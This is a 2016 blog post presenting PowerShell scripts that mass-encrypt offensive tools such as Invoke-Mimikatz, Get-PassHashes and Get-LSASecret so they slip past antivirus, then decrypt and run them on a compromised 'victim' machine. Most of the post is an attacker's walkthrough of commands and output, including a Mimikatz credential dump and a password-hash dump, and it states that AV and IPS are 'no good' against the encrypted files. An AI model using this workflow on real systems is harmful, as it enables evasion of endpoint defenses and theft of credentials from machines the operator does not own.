Wednesday, October 19, 2016

New Powershell Mass Encrypt and Decrypt modules

New Powershell Mass Encrypt and Decrypt modules

https://github.com/juushya/Scripts/blob/master/PS-MassEncScript.ps1
https://github.com/juushya/Scripts/blob/master/PS-DecScript.ps1

These scripts are sourced from / wrappers around PowerSploit's Out-Encrypted.ps1 script.

PowerSploit's Out-Encrypted.ps1 handles / encrypts one script at a time; encrypted file needs to be decrypted manually and then executed.

Using PS-MassEncScript.ps1, encrypt multiple scripts with a password and a salt value, in one go.

Move the encrypted files over to the target / compromised box. Since these files are encrypted, AV / IPS are no good - at least as of now.

Use PS-DecScript.ps1 to decrypt & execute any of these encrypted files.

See the example script runs below:

+++++
On Attacker's box

C:\ps_stuff>dir *.ps1
 Volume in drive C has no label.
 Volume Serial Number is 6CCE-B154

 Directory of C:\ps_stuff

10/19/2016  06:51 AM             4,850 Out-EncryptedScript.ps1
10/06/2016  04:42 AM             1,663 PS-DecScript.ps1
10/19/2016  01:56 AM             3,267 PS-MassEncScript.ps1
               3 File(s)          9,780 bytes
               0 Dir(s)  45,774,680,064 bytes free

C:\ps_stuff>
C:\ps_stuff>dir scripts            <--- directory where all scripts to be encrypted are stored
 Volume in drive C has no label.
 Volume Serial Number is 6CCE-B154

 Directory of C:\ps_stuff\scripts

10/19/2016  07:07 AM    <DIR>          .
10/19/2016  07:07 AM    <DIR>          ..
09/09/2016  12:06 PM             8,863 Get-LSASecret.ps1
09/09/2016  11:46 AM            14,948 Get-PassHashes.ps1
09/09/2016  11:38 AM         1,271,440 Invoke-Mimikatz.ps1
               3 File(s)      1,295,251 bytes
               2 Dir(s)  45,776,424,960 bytes free

C:\ps_stuff>

Normally, an AV will immediately flag these scripts, remove and / or block script execution.

Encrypt these scripts using PS-MassEncScript.

C:\ps_stuff>powershell
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\ps_stuff> 

Step 1 -> Import PS-MassEncScript.ps1
PS C:\ps_stuff> Import-Module C:\ps_stuff\PS-MassEncScript.ps1

Step 2 -> Execute PS-MassEncScript.ps1 with 4 parameters
PS C:\ps_stuff> PS-MassEncScript C:\ps_stuff\Out-EncryptedScript.ps1 C:\ps_stuff\scripts password salt

Here:
argument 1 -> C:\ps_stuff\Out-EncryptedScript.ps1 -> path to Out-EncryptedScript.ps1
argument 2 -> C:\ps_stuff\scripts -> path to scripts that you want to encrypt
argument 3 -> password
argument 4 -> salt

PS C:\ps_stuff> dir .\scripts

    Directory: C:\ps_stuff\scripts


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---          9/9/2016  12:06 PM       8863 Get-LSASecret.ps1
-a---        10/19/2016   7:10 AM      12809 Get-LSASecret_evil.ps1
-a---          9/9/2016  11:46 AM      14948 Get-PassHashes.ps1
-a---        10/19/2016   7:10 AM      20925 Get-PassHashes_evil.ps1
-a---          9/9/2016  11:38 AM    1271440 Invoke-Mimikatz.ps1
-a---        10/19/2016   7:10 AM    1696253 Invoke-Mimikatz_evil.ps1

PS C:\ps_stuff>

As you see above, the output encrypted scripts will be appended with a _evil suffix.


On the victim box:

Assuming you already have a cmd shell access, move these encrypted files on the victim box.

Format:
.\PS-Decrypt.ps1 <evil script name> password salt 'Command passed to evil ps1 script'

PS C:\victim> .\PS-DecScript.ps1 .\Invoke-Mimikatz_evil.ps1 password salt 'Inv
oke-Mimikatz -DumpCreds'
Executing .\Invoke-Mimikatz_evil.ps1

  .#####.   mimikatz 2.1 (x86) built on Feb 21 2016 18:42:23
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 17 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 117741 (00000000:0001cbed)
Session           : Interactive from 1
User Name         : Administrator
Domain            : win7ent-01-lab
Logon Server      : WIN7ENT-01-LAB
Logon Time        : 10/19/2016 6:47:25 AM
SID               : S-1-5-21-3784992239-1999550448-2462781864-500
        msv :


PS C:\victim> .\PS-DecScript.ps1 .\Get-PassHashes_evil.ps1 password salt 'Get-
PassHashes'
Executing .\Get-PassHashes_evil.ps1
...
<hash dump>
...

PS C:\victim>

+++++

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.